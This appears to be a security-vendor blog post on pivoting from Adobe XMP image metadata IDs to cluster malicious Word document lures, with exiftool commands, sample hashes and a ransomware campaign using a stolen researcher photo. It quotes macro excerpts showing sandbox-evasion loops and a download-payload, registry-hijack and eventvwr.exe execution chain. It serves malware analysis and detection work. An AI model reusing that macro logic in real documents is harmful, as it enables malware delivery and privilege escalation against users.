
Adobe XMP: Tales of an Overlooked Anchor


In this blog, we discuss Adobe Extensible Metadata Platform (XMP) identifiers (IDs) and how they can be used as both pivot and detection anchors. Defined as a standard for mapping graphical asset relationships, XMP allows for tracking of both parent-child relationships and individual revisions. There are three categories of identifiers: original document, document, and instance. Generally, XMP data is stored in XML format, updated on save/copy, and embedded within the graphical asset. This last tenet is critical to our needs as we’ll be tracking the usage and re-usage of both malicious and benign graphics within common Microsoft and Adobe document lures.


Let’s begin with a visual reference. In the following graphic, each column represents a single asset. Each row within that column represents a unique revision or “instance” of that asset. The first column represents the original asset with each subsequent column representing a copy of the previous column:

Each row within that column represents a unique revision or “instance” of that asset. The first column represents the original asset with each subsequent column representing a copy of the previous column.

Each instance of the asset carries with it three identifiers. The Original Document ID (OID), Document ID (DID), and Instance ID (IID). The Instance ID (IID) is updated on each saved revision of the asset. The Document ID (DID) remains the same for all revisions but is unique to that copy of the asset. Finally, the Original Document ID (OID) is a backreference to the original asset from which it was derived. We have observed two formats for these identifiers: MD5 hash (32 bytes) and GUID (36 bytes). Adobe XMP is an old standard originating back to 2001. To our knowledge, no one has previously applied the standard towards malware analysis.

Application and Alternatives

Having detailed the definitions, the question remains, how are these useful? First, graphical assets are commonly re-used across malware lures. Consider for example Microsoft Office documents that embed an image coercing the user to “enable content”. While the macro and payload may vary from sample to sample, we have observed the same graphical asset re-used across many variants. Second, graphical assets are commonly lifted from legitimate sources. Examples here include fake invoice and phishing scams that embed legitimate company logos. In either case, tracking the usage of a graphical asset can prove valuable.

There are alternatives to XMP of course. In order of worst to best applicable for this use case (in our humble opinion), one can lean on: cryptographic file hashes, Optical Character Recognition (OCR), or perceptual hashes (aHash, pHash, dHash, wHash). While XMP data is easily stripped, when available, it provides advantages over all of these techniques:

  • Cryptographic file hashes such as MD5, SHA1, SHA256, etc vary wildly with even a single bit change.
  • OCR is a compute-intensive and error-prone process. We’re already seeing malware authors leverage techniques to decrease the efficacy of OCR by, for example, implementing blurring or leveraging different shades of the same color for the foreground text and background. Additionally, not all graphical assets have text.
  • Perceptual hashes are also compute-intensive and error-prone, but generically a solid approach to apply when XMP data is unavailable.

In practice, InQuest watches ~1000 unique XMP IDs for the purposes of malware discovery. We utilize YARA hunt rules atop of VirusTotal Intelligence to harvest files into our corpora for further analysis (Deep File Inspection) and catalog. A significant slice of this data is made freely available to researchers via our free (as in beer) and open InQuest Labs data portal. Search an ever growing corpus of malicious and benign document samples by artifacts such as URLs, domains, IPs, e-mail addresses, file names, and XMP IDs. Upload documents for analysis and inclusion in the corpus. The usage of XMP IDs to anchor on new samples frequently results in the discovery of novel documents with low AV detection rates. Throughout the remainder of this blog, we’ll reference samples from so that readers can follow along with real-world samples.

Microsoft Office DOCX with PNG

We begin with a simple sample. A Microsoft Office Word Document, in DOCX format:


Beginning in 2007, Microsoft changed the default document file format from the Compound Document Format (CDF/OLE) to the Open XML format. These files can simply be renamed from .docx to .zip and decompressed with standard tools. Simply unzipping this document will reveal the following image in the path ./word/media/image1.png:

Downloading, renaming to .zip, and decompressing the archive results in the discovery of a graphical asset, ./tge-zip-1-1/word/media/image2.jpeg.

A classic malware lure that entices the user into enabling active content which, in turn, will execute malicious macro logic to pivot to further payload stages. Note that this document lure triggers detection through analysis of the semantic context embedded within the image and extracted via Optical Character Recognition (OCR). You can see that layer exposed via InQuest Labs as depicted here in a screenshot excerpt:

The layer exposed via InQuest Labs.

Use the labs portal to pivot to other samples with coercive content in the OCR or plain-text semantic layers. While this blog is not intended to cover the specifics of the macro malware, this is a well-rounded sample in the sense that it combines data from multiple layers in an attempt to avoid detection and we’ll take a slight detour to dissect it. These layers are trivially exposed through Deep File Inspection (DFI), a core tenet of the InQuest platform. Readers can follow along via this direct link on InQuest Labs, we begin with the following excerpt from the “Embedded Logic” layer which is executed upon document open via the startup hook “Auto_Open()”:

    For i = 1 To 65535555
        If i = 65535555 Then
            For t = 1 To 65535555
                If t = 65535555 Then
                    For b = 1 To 65535555
                        If b = 65535555 Then
                            For a = 1 To 65535555
                                If a = 65535555 Then
                                    For x = 1 To 65535555
                                        If x = 65535555 Then

Five embedded loops, each looping to 65,535,555, for a total of 327,677,775 seemingly superfluous executed directives before the next block of logic is executed. What’s the purpose of this? Probably an attempt at evading sandbox technologies that leverage dynamic analysis to monitor the behavior of samples in a controlled environment. By their nature, sample detonation must be limited in some way, be it based on time or instruction count. You can read more about sandbox technologies in our previous blog Defense in Depth: Detonation Technologies. Looking beyond this evasion logic, note that data is read from the “Semantic Context” layer of the document:

    Set c = ActiveDocument.Content

The data read is:


The “Start” and “End” markers are then stripped off and subsequent payload downloaded, executed, and hooked into the Windows Registry for persistence. The key lines of code from the VBA macro are shown here:

    StartWord = "Start": EndWord = "End"  
    geturl = Replace(Replace(c.Text, StartWord, ""), EndWord, "")  
    Call DownloadFile(URLtoFile, FilePath + "payload.exe")  
    Call RegiWrite("HKEY_CURRENT_USERSoftwareClassesmscfileshellopencommand", FilePath + "payload.exe")  
    RetVal = CreateObject("WScript.Shell").Run("eventvwr.exe")

The final executable payload, test.exe (VirusTotalJoe Sandbox), turns out to be a harmless pentest sample of sorts as the executable is downloaded from, home to a legitimate security researcher (side note: awesome background cinematic hacker ambient beat on this site… this is the soundtrack we’re using to kick off all hack sessions moving forward). Here is a screenshot of the benign output indicating the success of the execution of the lure:

Screenshot of the benign output indicating the success of the execution of the lure.

Switching focus back to the task at hand, let’s examine the AV consensus for the document lure on VirusTotal. Detection rates began with 14 vendors on 7/15/2018 and matured to 31 vendors on 9/24/2019, as depicted here:

Detection rates began with 14 vendors on 7/15/2018 and matured to 31 vendors on 9/24/2019

We can leverage standard Linux command-line tools to extract the XMP IDs from the image:$ strings ./word/media/image1.png | grep xpacket | xmllint --format - | grep iid

    xmp_CreatorTool="Adobe Photoshop CS6 (Windows)">

Or, alternatively, use the ever popular Exiftool:$ exiftool ./word/media/image1.png | grep -i xmp

    XMP Toolkit                     : Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27
    Original Document ID            : xmp.did:59D68E8C27A2E711964BBD7939DA4803
    Document ID                     : xmp.did:5F6437DAA22811E7975EC6C88D5BC4AF
    Instance ID                     : xmp.iid:5F6437D9A22811E7975EC6C88D5BC4AF
    Derived From Instance ID        : xmp.iid:59D68E8C27A2E711964BBD7939DA4803
    Derived From Document ID        : xmp.did:59D68E8C27A2E711964BBD7939DA480

Regardless of the approach, we’re going to leverage the IOC pivot tool on InQuest Labs to search for other samples that may contain images derived from the same parent asset (59D68E8C27A2E711964BBD7939DA4803).

InQuest Labs IOC Pivot Search
InQuest Labs IOC Pivot Search

The pivot reveals two additional samples:

  • 6b0aad2732169740ba5556ec7a8c90da05af208971a3821ab0c9c1fbdc4961f5 (VTInQuest Labs)
  • 0aa7b1554cf5a8deb29b145041623d7c67e42c04801637adb02b26203a96caaa (VTInQuest Labs)

Detection rates for sample 6b0aad27 started with 20 vendors on 8/19/2018 and matured to 34 vendors on 9/24/2019. Detection rates for 0aa7b155 started with only 6 vendors on 8/19/2019 and matured to 19 vendors on 9/24/2019. Their relevant scan histories are depicated below:

Detection rates for sample 6b0aad27 started with 20 vendors on 8/19/2018 and matured to 34 vendors on 9/24/2019.
Detection rates for 0aa7b155 started with only 6 vendors on 8/19/2019 and matured to 19 vendors on 9/24/2019.

We can immediately see the value of leveraging XMP IDs to identify related and potentially stealthier samples of the same campaign. As a generalized workflow:

  • Ingest files from a variety of sources, both benign and malicious.
  • Extract graphical assets looking for XMP identifiers.
  • Catalog these identifiers and reference that catalog for pivoting to other samples.

Researchers already employ similar tactics on IP and domain IOCs. This approach provides a pivot engine for a subset of file content.

Microsoft Office DOCX with JPG

Having demonstrated the fundamental value of XMP identifier pivoting, let’s dive into another DOCX example, this time with an embedded JPG. This sample is also available on InQuest Labs so readers can follow along, the SHA256 hash value is:fa97740770f45666ed17ca3b536b513bd99cbfa0c1feeb25dc5c08019831969e

AV consensus on this malicious document lure started with 6 vendors on 7/22/2019 and matured to 32 vendors by 9/29/2019. Once again, downloading, renaming to .zip, and decompressing the archive results in the discovery of a graphical asset, ./tge-zip-1-1/word/media/image2.jpeg, shown here:

Graphical asset

There’s another image in the media folder, image1.jpeg, we’ll circle back to that shortly. Looking at the extracted IOCs panel under InQuest Labs, we see a number of XMP IDs in both GUID and MD5 formats:

XMP IDs in both GUID and MD5 formats

The XMP IDs above are collected from all graphical assets that were discovered in the DFI process. We can pivot on each of the IOCs directly from the interface, which will include the “xmp.[doi]id:” prefix. Stripping the prefix will expand our search and we’ve curated the complete list for your convenience and exploration here:

While we’re focused on XMP pivots in this blog, readers should note that there are other interesting pivots that can be made as well, including:

Let’s manually extract the XMP identifiers from image2.jpeg using Exiftool and focus solely on those:$ exiftool image2.jpeg | grep -i xmp

    Toolkit                          : Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27
    Instance ID                      : xmp.iid:CAE628A27467E911AD18A821864C67C5
    Document ID                      : xmp.did:B3D4F1219157E911B37B9950729CB11D
    Original Document ID             : xmp.did:B3D4F1219157E911B37B9950729CB11D
    History Instance ID   XMP        : xmp.iid:B3D4F1219157E911B37B9950729CB11D, 
    Derived From Instance ID         : xmp.iid:C9E628A27467E911AD18A821864C67C5
    Derived From Document ID         : xmp.did:B3D4F1219157E911B37B9950729CB11D
    Derived From Original Document ID: xmp.did:B3D4F1219157E911B37B9950729CB11D

The instance ID for this specific asset is CAE628A27467E911AD18A821864C67C5, looking one level up at the document ID or original document ID we see B3D4F1219157E911B37B9950729CB11D. We can pivot on this identifier through InQuest Labs:

As of the time of this writing, the above search results in 88 different XMP records spread across 44 unique files. The complete list of SHA256 hashes is listed here in alphabetical order. We’ve highlighted the 8th hash below, more on this sample in the next segment.

  1. 00121f1606d92c3a1e33c1d4fdf46240dafe3f5e188c15a70b19b2bf7af1c227
  2. 06d2335b3e09d7e1e5c7d5c130c908fb2ecc3203f3588f965597d01e2a8b6937
  3. 0dfaa85dfbc21fed86337d2b3fdea8f82679ad23cbdeb3421d5f96e4dff8acfb
  4. 0f4004c71d7be998222325b9692ae3c302995ceba152e71cff567103dcd4d5fc
  5. 1f2c096dbf1229c381e9c8d4ac462c35f2da6991fd278d93c476d14d48848243
  6. 1f4fcfd867258e15a99ac77f4a0c3b57ecd1fbf9c76f0e7b47c41a475d84679f
  7. 3380235f6de3db4eac0f1212a2608f8b02b1cef68cf5db34e445e729623e686a
  8. 38aa04842e21290b90e50ab2d724dbbdfd47767f072f7351f51af107125bc7d1
  9. 3c57e01c98454cab1c80d79bec69f562bdeec063ab4fb96c174fb9b2ec58c844
  10. 43179d0781d2060a64fe30229a02839cd3bde5d2f324de35b3e0281b0e737a97
  11. 47079047672a5623fd32d2ee59e572125f813693c0e4500bdddfb8da443555bf
  12. 4e4f051a44d6695c39133e8ca9efbc5b9e405047e2de4cb5dc1e686466a92121
  13. 4fa9446c629c3eac4e3e08edec00014520231ba9cca7d33243c8be857aad6f81
  14. 5015f68a8c4a3bb1ca8617210311d95275bd2950475cc4dca17a533de53144e1
  15. 5042143c8d1ca43a1bc9cf7e9040fdaec1feded1df63a636dfedb639945a2fcc
  16. 5413abf53b1849ce6df0b033b40cb7b57672452837bb8288e67c4ff88a48c3ae
  17. 54a029ed71862a19c4b891dc87f5388d10f125f2fe71ac891f7c19b7e814f8f4
  18. 54ebc0d9d9d2a78d4e6d59abdadfed06ea4fa828786a4690a5a1c74bba3ce2cd
  19. 55d837894d33312359cf8dc75def9571ea2a039848fc8c3b791090b97aa825f7
  20. 5b88f32d73be23510dc431977a67049a94ebecb8b8d20a53b3b0d878482baa0e
  21. 73600566cf58f255b6e4432edeb6387abf20b56d6f1ddbb98fea3db7d4c4c85d
  22. 7e3428e040e27afb40bfdd1af3533cc6353539869baa254424df8a40ee56ca93
  23. 7f971db182b02c6e0dca36e010304b5f684e9909db586f5a983d288c9eef26c8
  24. 879737700c55cd430e6e6dd7b89cf65df9c7f4eda40488a5c6dcd3a7ff898afc
  25. 880a410c6fd450a5a8c353a3dad432b6ea763bfe9ad258dab685ccf922ae297b
  26. 8b0464dd223a3478fa4053410bd0e3ee190eb151c473ef339dd4a1f99fffc626
  27. 8d776245b87ccdd6dddf1e2f5eccf0315de6e899490c2a78a008b6115fc12c46
  28. 8ec3a628d9b1d49201917978c24f1e2891b57b163f0f5bb3b51251474d71598b
  29. 9506670a5d7f941bf96120353408a60805f5c3822e3946997a3a0a712703423a
  30. 96fdb605c2bbd3a8b570e5c23f9f92ee83d37ca841ab3add23ff01ff73d3a57e
  31. 97a476f1d46cfa6cd800b87baf5f7810cb6a5c232a831ac682b8bd376c8def70
  32. 980d8d3e67fb19ea5ef37aa2098225d10d97718f446d92b4e0d1b96980747adf
  33. 988f21477f5026b45ae691bbd69fe1fc1914d8a89eba18cf9a0a5ac1938c9754
  34. ac868175af09137932aa8472be136ffa15a0cf2f6a04b397cb0bced6c48aad02
  35. af9c1bd692933b925163b3899a003c54d4598c48edc2fc873d4e34d089b79308
  36. b0b0953063b3cb8a380034104795176bfb51266b6b96c60716b4f272c88af9db
  37. b45ff736c52a3e6a9ff0c93d63a9aa27906cb350d8311236b67d2d9d7fca8e41
  38. b5986e67a0888ff58c7ca28b9433476d3866d5338a36a68e3e0297d0edda144a
  39. bc6537ff96c9cb760170f4a0b5805f35591a31bf982bbd432cbcd44efe46c022
  40. cc81be86c7896285698949e3015f1e940f0be91ddca045901e947f5d6bee03ff
  41. ded9746abb7085f8a5ba1bb805b019ab6adeb85d93abe8b7cab4bdd5fa3e029c
  42. e1359cfe046cd7137ab8480a893df358370ebb07266b0af222e257ee8ccd66e1
  43. e786312e4226bf2c364fe96d3a7ff133b302681686dc31f45b661884d0686b76
  44. fa97740770f45666ed17ca3b536b513bd99cbfa0c1feeb25dc5c08019831969e

More Interesting Pivots


Recall from earlier in the blog we compared and contrasted a variety of methods for tracking graphical asset re-use across malware lures. Cryptographic file hashes, perception hashes, and OCR based semantic extraction. We posited that, when available, XMP identifiers provide a fast and valuable alternative to these methods. Let’s take a look at highlighted 8th hash from the list above:


This document lure provides a great example of the value of the XMP approach. Here’s image2.jpeg from that sample:

Document lure that provides a great example of the value of the XMP approach

Note that it is the German language equivalent of the image2.jpeg from the original lure. The unique instance ID for this asset is B6D4F1219157E911B37B9950729CB11D, as shown here through Exiftool:$ cat image2.jpeg.exiftool | grep -i xmp

    XMP Toolkit                      : Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27
    Instance ID                      : xmp.iid:B6D4F1219157E911B37B9950729CB11D
    Document ID                      : xmp.did:B3D4F1219157E911B37B9950729CB11D
    Original Document ID             : xmp.did:B3D4F1219157E911B37B9950729CB11D
    History Instance ID              : xmp.iid:B3D4F1219157E911B37B9950729CB11D
    Derived From Instance ID         : xmp.iid:B5D4F1219157E911B37B9950729CB11D
    Derived From Document ID         : xmp.did:B3D4F1219157E911B37B9950729CB11D
    Derived From Original Document ID: xmp.did:B3D4F1219157E911B37B9950729CB11D

But the asset shares the same parent ID of B3D4F1219157E911B37B9950729CB11D with CAE628A27467E911AD18A821864C67C5. To think about this in human terms. An initial asset was created and saved, then the text translated and resaved. Thus producing two unique assets with the same parent ID. While this relationship can also be derived from a perception hash, the XMP approach is far better performing. Again, readers should note that other pivot options are available. For example, searching for the German language equivalent of “Enable Content”.


Recall from earlier in the DOCX with JPG example that we glazed over image1.jpeg. Let’s circle back and take a look at that image now:

Template for a structured resume

It looks like a template for a structured resume. The profile shot looks legitimate as well, though who knows in this day and age of generative algorithms. Carving out the profile photo and feeding it through the TinEye reverse image search, we get a match on Dr. Britta Höllermann, a [German university research assistant}( whose identity is seemingly being leveraged as part of the social engineering dimension of this malware campaign. Let’s compare the XMP identifiers between the image above and the image found via the reverse image search below:

Dr. Britta Höllermann, a [German university research assistant] whose identity is seemingly being leveraged as part of the social engineering dimension of this malware campaign.
# malware lure embedded image.
$ exiftool image1.jpeg | grep -i xmp
    XMP Toolkit                     : Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27
    Instance ID                     : xmp.iid:78113FDD7F57E911B37B9950729CB11D
    History Instance ID             : xmp.iid:77113FDD7F57E911B37B9950729CB11D
    Document Ancestors              : xmp.did:97ba5d41-3019-4fa8-8e66-c2edb9f4b5e8
# reverse image search discovered match.
$ wget
$ exiftool 1bh.jpg | grep -i xmp
XMP Toolkit                     : Adobe XMP Core 5.5-c002 1.148022, 2012/07/15-18:06:45
Document ID                     : xmp.did:97ba5d41-3019-4fa8-8e66-c2edb9f4b5e8
Instance ID                     : xmp.iid:d1b150a4-7321-4874-b61e-ac58bf4f81d2
History Instance ID             : xmp.iid:635cbfe1-2c45-49f0-9158-19ec213c86e7, 
Derived From Instance ID        : xmp.iid:AD90EF6D362068118083F8015B1BC4AF
Derived From Document ID        : xmp.did:97ba5d41-3019-4fa8-8e66-c2edb9f4b5e8

Notice the overlap here. The ancestor document GUID from the malware lure matches that of the asset discovered via reverse image search. Pivoting from this XMP identifier, we’re able to enumerate other malware samples that impersonate Dr. Höllermann. We found ~150 unique malware samples with an average of ~10 AV detections on samples that overlap with VT. Tracing the campaign further we determine that the majority of final delivered executable payloads is ransomware, one example instance being:


Wrapping Up…

We hope to have inspired additional research atop of sample clustering through XMP identifier relationships and look forward to feedback from the community with how we can make InQuest labs an invaluable tool for your research projects. Get in touch with us directly via Twitter or e-mail.

Free On-Demand Webinar: Think Before You Click

Whether sent as an email attachment, sitting in your cloud or traversing the Web, file-borne threats have become a proven favorite for delivering malware and phishing campaigns. View our webinar on-demand and get firsthand tips about how to safeguard your cybersecurity stack with File Detection and Response (FDR) and stop file-borne threats in their tracks.

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